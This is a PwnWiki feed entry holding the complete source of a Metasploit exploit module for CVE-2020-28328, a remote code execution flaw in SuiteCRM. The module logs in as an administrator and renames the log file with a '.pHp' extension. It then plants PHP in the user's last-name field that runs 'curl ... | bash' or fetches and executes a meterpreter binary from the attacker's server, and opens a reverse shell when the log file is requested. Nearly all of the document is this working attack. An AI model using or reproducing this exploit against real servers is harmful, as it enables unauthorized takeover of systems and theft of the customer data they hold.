https://pwnwiki.com/api.php?action=feedcontributions&feedformat=atom&user=%E7%8C%AA%E5%84%BF%E8%99%AB PwnWiki - User contributions [Chinese] 2026-04-03T18:25:17Z User contributions MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-28328_SuiteCRM_Log_File_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5376 CVE-2020-28328 SuiteCRM Log File 遠程代碼執行漏洞 2021-06-19T16:23:02Z <p>猪儿虫: Marked this version for translation</p> <hr /> <div>&lt;languages /&gt;<br /> &lt;translate&gt;<br /> ==MSF模塊== &lt;!--T:1--&gt;<br /> &lt;/translate&gt;<br /> &lt;pre&gt;<br /> ##<br /> # This module requires Metasploit: https://metasploit.com/download<br /> # Current source: https://github.com/rapid7/metasploit-framework<br /> ##<br /> <br /> class MetasploitModule &lt; Msf::Exploit::Remote<br /> Rank = GoodRanking<br /> <br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> <br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' =&gt; 'SuiteCRM Log File Remote Code Execution',<br /> 'Description' =&gt; %q{<br /> This module exploits an input validation error on the log file extension parameter. It does<br /> not properly validate upper/lower case characters. Once this occurs, the application log file<br /> will be treated as a php file. The log file can then be populated with php code by changing the<br /> username of a valid user, as this info is logged. The php code in the file can then be executed<br /> by sending an HTTP request to the log file. A similar issue was reported by the same researcher<br /> where a blank file extension could be supplied and the extension could be provided in the file<br /> name. This exploit will work on those versions as well, and those references are included.<br /> },<br /> 'License' =&gt; MSF_LICENSE,<br /> 'Author' =&gt;<br /> [<br /> 'M. Cory Billington' # @_th3y<br /> ],<br /> 'References' =&gt;<br /> [<br /> ['CVE', '2020-28328'], # First CVE<br /> ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.<br /> ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit<br /> ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit<br /> ],<br /> 'Platform' =&gt; %w[linux unix],<br /> 'Arch' =&gt; %w[ARCH_X64 ARCH_CMD ARCH_X86],<br /> 'Targets' =&gt;<br /> [<br /> [<br /> 'Linux (x64)', {<br /> 'Arch' =&gt; ARCH_X64,<br /> 'Platform' =&gt; 'linux',<br /> 'DefaultOptions' =&gt; {<br /> 'PAYLOAD' =&gt; 'linux/x64/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Linux (cmd)', {<br /> 'Arch' =&gt; ARCH_CMD,<br /> 'Platform' =&gt; 'unix',<br /> 'DefaultOptions' =&gt; {<br /> 'PAYLOAD' =&gt; 'cmd/unix/reverse_bash'<br /> }<br /> }<br /> ]<br /> ],<br /> 'Notes' =&gt;<br /> {<br /> 'Stability' =&gt; [CRASH_SAFE],<br /> 'SideEffects' =&gt; [ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' =&gt; [REPEATABLE_SESSION]<br /> },<br /> 'Privileged' =&gt; true,<br /> 'DisclosureDate' =&gt; '2021-04-28',<br /> 'DefaultTarget' =&gt; 0<br /> )<br /> )<br /> <br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),<br /> OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),<br /> OptString.new('PASS', [true, 'Password for administrator', 'admin']),<br /> OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),<br /> OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),<br /> OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])<br /> ]<br /> )<br /> end<br /> <br /> def check<br /> authenticate unless @authenticated<br /> return Exploit::CheckCode::Unknown unless @authenticated<br /> <br /> version_check_request = send_request_cgi(<br /> {<br /> 'method' =&gt; 'GET',<br /> 'uri' =&gt; normalize_uri(target_uri.path, 'index.php'),<br /> 'keep_cookies' =&gt; true,<br /> 'vars_get' =&gt; {<br /> 'module' =&gt; 'Home',<br /> 'action' =&gt; 'About'<br /> }<br /> }<br /> )<br /> <br /> return Exploit::CheckCode::Unknown(&quot;#{peer} - Connection timed out&quot;) unless version_check_request<br /> <br /> version_match = version_check_request.body[/<br /> Version<br /> \s<br /> \d{1} # Major revision<br /> \.<br /> \d{1,2} # Minor revision<br /> \.<br /> \d{1,2} # Bug fix release<br /> /x]<br /> <br /> version = version_match.partition(' ').last<br /> <br /> if version.nil? || version.empty?<br /> about_url = &quot;#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&amp;action=About&quot;<br /> return Exploit::CheckCode::Unknown(&quot;Check #{about_url} to confirm version.&quot;)<br /> end<br /> <br /> patched_version = Rex::Version.new('7.11.18')<br /> current_version = Rex::Version.new(version)<br /> <br /> return Exploit::CheckCode::Appears(&quot;SuiteCRM #{version}&quot;) if current_version &lt;= patched_version<br /> <br /> Exploit::CheckCode::Safe(&quot;SuiteCRM #{version}&quot;)<br /> end<br /> <br /> def authenticate<br /> print_status(&quot;Authenticating as #{datastore['USER']}&quot;)<br /> initial_req = send_request_cgi(<br /> {<br /> 'method' =&gt; 'GET',<br /> 'uri' =&gt; normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' =&gt; true,<br /> 'vars_get' =&gt; {<br /> 'module' =&gt; 'Users',<br /> 'action' =&gt; 'Login'<br /> }<br /> }<br /> )<br /> <br /> return false unless initial_req &amp;&amp; initial_req.code == 200<br /> <br /> login = send_request_cgi(<br /> {<br /> 'method' =&gt; 'POST',<br /> 'uri' =&gt; normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' =&gt; true,<br /> 'vars_post' =&gt; {<br /> 'module' =&gt; 'Users',<br /> 'action' =&gt; 'Authenticate',<br /> 'return_module' =&gt; 'Users',<br /> 'return_action' =&gt; 'Login',<br /> 'user_name' =&gt; datastore['USER'],<br /> 'username_password' =&gt; datastore['PASS'],<br /> 'Login' =&gt; 'Log In'<br /> }<br /> }<br /> )<br /> <br /> return false unless login &amp;&amp; login.code == 302<br /> <br /> res = send_request_cgi(<br /> {<br /> 'method' =&gt; 'GET',<br /> 'uri' =&gt; normalize_uri(target_uri, 'index.php'),<br /> 'keep_cookies' =&gt; true,<br /> 'vars_get' =&gt; {<br /> 'module' =&gt; 'Administration',<br /> 'action' =&gt; 'index'<br /> }<br /> }<br /> )<br /> <br /> auth_succeeded?(res)<br /> end<br /> <br /> def auth_succeeded?(res)<br /> return false unless res<br /> <br /> if res.code == 200<br /> print_good(&quot;Authenticated as: #{datastore['USER']}&quot;)<br /> if res.body.include?('Unauthorized access to administration.')<br /> print_warning(&quot;#{datastore['USER']} does not have administrative rights! Exploit will fail.&quot;)<br /> @is_admin = false<br /> else<br /> print_good(&quot;#{datastore['USER']} has administrative rights.&quot;)<br /> @is_admin = true<br /> end<br /> @authenticated = true<br /> return true<br /> else<br /> print_error(&quot;Failed to authenticate as: #{datastore['USER']}&quot;)<br /> return false<br /> end<br /> end<br /> <br /> def post_log_file(data)<br /> send_request_cgi(<br /> {<br /> 'method' =&gt; 'POST',<br /> 'uri' =&gt; normalize_uri(target_uri, 'index.php'),<br /> 'ctype' =&gt; &quot;multipart/form-data; boundary=#{data.bound}&quot;,<br /> 'keep_cookies' =&gt; true,<br /> 'headers' =&gt; {<br /> 'Referer' =&gt; &quot;#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&amp;action=EditView&quot;<br /> },<br /> 'data' =&gt; data.to_s<br /> }<br /> )<br /> end<br /> <br /> def modify_system_settings_file<br /> filename = rand_text_alphanumeric(8).to_s<br /> extension = '.pHp'<br /> @php_fname = filename + extension<br /> action = 'Modify system settings file'<br /> print_status(&quot;Trying - #{action}&quot;)<br /> <br /> data = Rex::MIME::Message.new<br /> data.add_part('SaveConfig', nil, nil, 'form-data; name=&quot;action&quot;')<br /> data.add_part('Configurator', nil, nil, 'form-data; name=&quot;module&quot;')<br /> data.add_part(filename.to_s, nil, nil, 'form-data; name=&quot;logger_file_name&quot;')<br /> data.add_part(extension.to_s, nil, nil, 'form-data; name=&quot;logger_file_ext&quot;')<br /> data.add_part('info', nil, nil, 'form-data; name=&quot;logger_level&quot;')<br /> data.add_part('Save', nil, nil, 'form-data; name=&quot;save&quot;')<br /> <br /> res = post_log_file(data)<br /> check_logfile_request(res, action)<br /> end<br /> <br /> def poison_log_file<br /> action = 'Poison log file'<br /> if target.arch.first == 'cmd'<br /> command_injection = &quot;&lt;?php `curl #{@download_url} | bash`; ?&gt;&quot;<br /> else<br /> @meterpreter_fname = &quot;#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}&quot;<br /> command_injection = %(<br /> &lt;?php `curl #{@download_url} -o #{@meterpreter_fname};<br /> /bin/chmod 700 #{@meterpreter_fname};<br /> /bin/sh -c #{@meterpreter_fname};`; ?&gt;<br /> )<br /> end<br /> <br /> print_status(&quot;Trying - #{action}&quot;)<br /> <br /> data = Rex::MIME::Message.new<br /> data.add_part('Users', nil, nil, 'form-data; name=&quot;module&quot;')<br /> data.add_part('1', nil, nil, 'form-data; name=&quot;record&quot;')<br /> data.add_part('Save', nil, nil, 'form-data; name=&quot;action&quot;')<br /> data.add_part('EditView', nil, nil, 'form-data; name=&quot;page&quot;')<br /> data.add_part('DetailView', nil, nil, 'form-data; name=&quot;return_action&quot;')<br /> data.add_part(datastore['USER'], nil, nil, 'form-data; name=&quot;user_name&quot;')<br /> data.add_part(command_injection, nil, nil, 'form-data; name=&quot;last_name&quot;')<br /> <br /> res = post_log_file(data)<br /> check_logfile_request(res, action)<br /> end<br /> <br /> def restore<br /> action = 'Restore logging to default configuration'<br /> print_status(&quot;Trying - #{action}&quot;)<br /> <br /> data = Rex::MIME::Message.new<br /> data.add_part('SaveConfig', nil, nil, 'form-data; name=&quot;action&quot;')<br /> data.add_part('Configurator', nil, nil, 'form-data; name=&quot;module&quot;')<br /> data.add_part('suitecrm', nil, nil, 'form-data; name=&quot;logger_file_name&quot;')<br /> data.add_part('.log', nil, nil, 'form-data; name=&quot;logger_file_ext&quot;')<br /> data.add_part('fatal', nil, nil, 'form-data; name=&quot;logger_level&quot;')<br /> data.add_part('Save', nil, nil, 'form-data; name=&quot;save&quot;')<br /> <br /> post_log_file(data)<br /> <br /> data = Rex::MIME::Message.new<br /> data.add_part('Users', nil, nil, 'form-data; name=&quot;module&quot;')<br /> data.add_part('1', nil, nil, 'form-data; name=&quot;record&quot;')<br /> data.add_part('Save', nil, nil, 'form-data; name=&quot;action&quot;')<br /> data.add_part('EditView', nil, nil, 'form-data; name=&quot;page&quot;')<br /> data.add_part('DetailView', nil, nil, 'form-data; name=&quot;return_action&quot;')<br /> data.add_part(datastore['USER'], nil, nil, 'form-data; name=&quot;user_name&quot;')<br /> data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=&quot;last_name&quot;')<br /> <br /> res = post_log_file(data)<br /> <br /> print_error(&quot;Failed - #{action}&quot;) unless res &amp;&amp; res.code == 301<br /> <br /> print_good(&quot;Succeeded - #{action}&quot;)<br /> end<br /> <br /> def check_logfile_request(res, action)<br /> fail_with(Failure::Unknown, &quot;#{action} - no reply&quot;) unless res<br /> <br /> unless res.code == 301<br /> print_error(&quot;Failed - #{action}&quot;)<br /> fail_with(Failure::UnexpectedReply, &quot;Failed - #{action}&quot;)<br /> end<br /> <br /> print_good(&quot;Succeeded - #{action}&quot;)<br /> end<br /> <br /> def execute_php<br /> print_status(&quot;Executing php code in log file: #{@php_fname}&quot;)<br /> res = send_request_cgi(<br /> {<br /> 'uri' =&gt; normalize_uri(target_uri, @php_fname),<br /> 'keep_cookies' =&gt; true<br /> }<br /> )<br /> fail_with(Failure::NotFound, &quot;#{peer} - Not found: #{@php_fname}&quot;) if res &amp;&amp; res.code == 404<br /> register_files_for_cleanup(@php_fname)<br /> register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?<br /> end<br /> <br /> def on_request_uri(cli, _request)<br /> send_response(cli, payload.encoded, { 'Content-Type' =&gt; 'text/plain' })<br /> print_good(&quot;#{peer} - Payload sent!&quot;)<br /> end<br /> <br /> def start_http_server<br /> start_service(<br /> {<br /> 'Uri' =&gt; {<br /> 'Proc' =&gt; proc do |cli, req|<br /> on_request_uri(cli, req)<br /> end,<br /> 'Path' =&gt; resource_uri<br /> }<br /> }<br /> )<br /> @download_url = get_uri<br /> end<br /> <br /> def exploit<br /> start_http_server<br /> authenticate unless @authenticated<br /> fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated<br /> fail_with(Failure::NoAccess, &quot;#{datastore['USER']} does not have administrative rights!&quot;) unless @is_admin<br /> modify_system_settings_file<br /> poison_log_file<br /> execute_php<br /> ensure<br /> restore if datastore['RESTORECONF']<br /> end<br /> end<br /> &lt;/pre&gt;</div> 猪儿虫